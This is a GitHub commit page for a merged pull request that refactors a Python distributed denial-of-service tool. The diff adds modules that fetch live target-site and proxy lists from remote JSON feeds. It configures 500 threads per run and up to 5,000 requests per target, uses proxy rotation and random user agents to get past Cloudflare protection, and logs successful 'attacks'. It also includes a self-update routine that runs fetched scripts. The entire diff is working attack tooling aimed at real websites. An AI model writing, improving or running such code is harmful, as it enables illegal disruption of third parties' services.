Skip to content

Commit

Permalink
Merge pull request AlexTrushkovsky#42 from AlexTrushkovsky/optimized
Browse files Browse the repository at this point in the history
Optimized
  • Loading branch information
AlexTrushkovsky authored Mar 1, 2022
2 parents b508401 + c38e6d3 commit 65ae960
Show file tree
Hide file tree
Showing 4 changed files with 123 additions and 64 deletions.
5 changes: 5 additions & 0 deletions .gitignore
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
.idea/
venv/
build/
dist/
__pycache__/
64 changes: 64 additions & 0 deletions RemoteProvider.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,64 @@
import time
import json
import cloudscraper
from functools import lru_cache
from random import choice
from urllib.parse import unquote

import settings


class RemoteProvider:
def __init__(self, targets=None):
self.targets = [unquote(target) for target in targets] if targets else None
self._proxies = []
self.sites = []
self.scraper = cloudscraper.create_scraper(browser=settings.BROWSER, )

def _scrap_json(self, link):
host = choice(link)
content = self.scraper.get(host).content
if content:
try:
data = json.loads(content)
return data
except json.decoder.JSONDecodeError:
raise Exception('Host {} has invalid format'.format(host))
except Exception:
raise Exception('Unexpected error. Host {}'.format(host))
else:
raise Exception('Unexpected error. Host {}'.format(host))

def _get_ttl_hash(seconds=settings.TARGET_UPDATE_RATE):
"""Return the same value within `seconds` time period"""
return round(time.time() / seconds)

@lru_cache()
def get_target_site(self, ttl_hash=_get_ttl_hash()):
del ttl_hash
if self.targets:
self.sites = self.targets
else:
try:
data = self._scrap_json(settings.SITES_HOSTS)
self.sites = []
for site in data:
if 'attack' not in site or ('attack' in site and not site['attack'] == 0):
if not site['page'].startswith('http'):
site['page'] = "https://" + site['page']
self.sites.append(unquote(site['page']))
except Exception as e:
raise e

return choice(self.sites)

@lru_cache()
def get_proxies(self, ttl_hash=_get_ttl_hash()):
del ttl_hash
try:
data = self._scrap_json(settings.PROXIES_HOSTS)
self._proxies = data
except Exception as e:
raise e

return self._proxies
106 changes: 42 additions & 64 deletions attack.py
Original file line number Diff line number Diff line change
@@ -1,42 +1,28 @@
import json
import os
import platform
import sys

from argparse import ArgumentParser
from concurrent.futures import ThreadPoolExecutor, as_completed
from gc import collect
from os import system
from random import choice
from sys import stderr
from threading import Thread
from time import sleep
from urllib.parse import unquote

import cloudscraper
from loguru import logger
from pyuseragents import random as random_useragent
from requests.exceptions import ConnectionError
from urllib3 import disable_warnings

VERSION = 7
HOSTS = ["http://65.108.20.65"]
MAX_REQUESTS = 5000
SUPPORTED_PLATFORMS = {
'linux': 'Linux'
}
import settings
from RemoteProvider import RemoteProvider

disable_warnings()


def clear():
if platform.system() == "Linux":
return system('clear')
else:
return system('cls')


parser = ArgumentParser()
parser.add_argument('threads', nargs='?', default=500)
parser.add_argument('threads', nargs='?', default=settings.DEFAULT_THREADS)
parser.add_argument("-n", "--no-clear", dest="no_clear", action='store_true')
parser.add_argument("-p", "--proxy-view", dest="proxy_view", action='store_true')
parser.add_argument("-t", "--targets", dest="targets", nargs='+', default=[])
Expand All @@ -51,7 +37,7 @@ def clear():
no_clear = args.no_clear
proxy_view = args.proxy_view

targets = args.targets
remoteProvider = RemoteProvider(args.targets)
threads = int(args.threads)

logger.remove()
Expand All @@ -65,100 +51,85 @@ def clear():
<cyan>{line}</cyan> - <white>{message}</white>",
level="SUCCESS")

def checkReq():

def check_req():
os.system("python3 -m pip install -r requirements.txt")
os.system("python -m pip install -r requirements.txt")
os.system("pip install -r requirements.txt")
os.system("pip3 install -r requirements.txt")


def checkUpdate():

def check_update():
logger.info("Checking Updates...")
updateScraper = cloudscraper.create_scraper(
browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
url = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
update_scraper = cloudscraper.create_scraper(
browser=settings.BROWSER, )
try:
content = updateScraper.get(url).content
content = update_scraper.get(settings.UPDATE_URL).content
if content:
data = json.loads(content)
new_version = data["version"]
logger.info("Version: ", new_version)
if int(new_version) > int(VERSION):
if int(new_version) > int(settings.VERSION):
logger.info("New version Available")
os.system("python updater.py " + str(threads))
os.system("python3 updater.py " + str(threads))
exit()
else:
sleep(5)
checkUpdate()
check_update()
except:
sleep(5)
checkUpdate()
check_update()


def mainth():
result = 'processing'
scraper = cloudscraper.create_scraper(
browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
browser=settings.BROWSER, )
scraper.headers.update(
{'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(),
'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https',
'Accept-Encoding': 'gzip, deflate, br'})

while True:
scraper = cloudscraper.create_scraper(
browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
logger.info("GET RESOURCES FOR ATTACK")
host = choice(HOSTS)
content = scraper.get(host).content
if content:
try:
data = json.loads(content)
except json.decoder.JSONDecodeError:
logger.info('Host {} has invalid format'.format(host))
sleep(5)
continue
except Exception:
logger.exception('Unexpected error. Host {}'.format(host))
sleep(5)
continue
else:
try:
site = remoteProvider.get_target_site()
except Exception as e:
logger.exception(e)
sleep(5)
continue

site = unquote(choice(targets) if targets else data['site']['page'])
logger.info("STARTING ATTACK TO " + site)
logger.info("STARTING ATTACK ON " + data['site']['page'])
site = unquote(data['site']['page'])
if site.startswith('http') == False:
site = "https://" + site

attacks_number = 0

try:
attack = scraper.get(site, timeout=10)
attack = scraper.get(site, timeout=settings.READ_TIMEOUT)

if attack.status_code >= 302:
for proxy in data['proxy']:
for proxy in remoteProvider.get_proxies():
if proxy_view:
logger.info('USING PROXY:' + proxy["ip"] +" "+ proxy["auth"])
logger.info('USING PROXY:' + proxy["ip"] + " " + proxy["auth"])
scraper.proxies.update(
{'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'})
response = scraper.get(site)
if response.status_code >= 200 and response.status_code <= 302:
for i in range(MAX_REQUESTS):
if 200 <= response.status_code <= 302:
for i in range(settings.MAX_REQUESTS):
response = scraper.get(site, timeout=10)
attacks_number += 1
logger.info("ATTACKED; RESPONSE CODE: " +
str(response.status_code))
else:
for i in range(MAX_REQUESTS):
for i in range(settings.MAX_REQUESTS):
response = scraper.get(site, timeout=10)
attacks_number += 1
logger.info("ATTACKED; RESPONSE CODE: " +
str(response.status_code))
if attacks_number > 0:
logger.success("SUCCESSFUL ATTACKS on" + site + ": " + str(attacks_number))
logger.success("SUCCESSFUL ATTACKS on " + site + ": " + str(attacks_number))
except ConnectionError as exc:
logger.success(f"{site} is down: {exc}")
except Exception as exc:
Expand All @@ -169,10 +140,17 @@ def mainth():
return result, site


def clear():
if platform.system() == "Linux":
return system('clear')
else:
return system('cls')


def cleaner():
while True:
sleep(60)
checkUpdate()
check_update()

if not no_clear:
clear()
Expand All @@ -182,8 +160,8 @@ def cleaner():
if __name__ == '__main__':
if not no_clear:
clear()
checkReq()
checkUpdate()
check_req()
check_update()
Thread(target=cleaner, daemon=True).start()

with ThreadPoolExecutor(max_workers=threads) as executor:
Expand Down
12 changes: 12 additions & 0 deletions settings.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
VERSION = 7
SITES_HOSTS = ["https://raw.githubusercontent.com/opengs/uashieldtargets/master/sites.json"]
PROXIES_HOSTS = ["https://raw.githubusercontent.com/opengs/uashieldtargets/master/proxy.json"]
MAX_REQUESTS = 5000
DEFAULT_THREADS = 500
TARGET_UPDATE_RATE = 600
READ_TIMEOUT = 10
SUPPORTED_PLATFORMS = {
'linux': 'Linux'
}
UPDATE_URL = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
BROWSER = {'browser': 'firefox', 'platform': 'android', 'mobile': True}

0 comments on commit 65ae960

Please sign in to comment.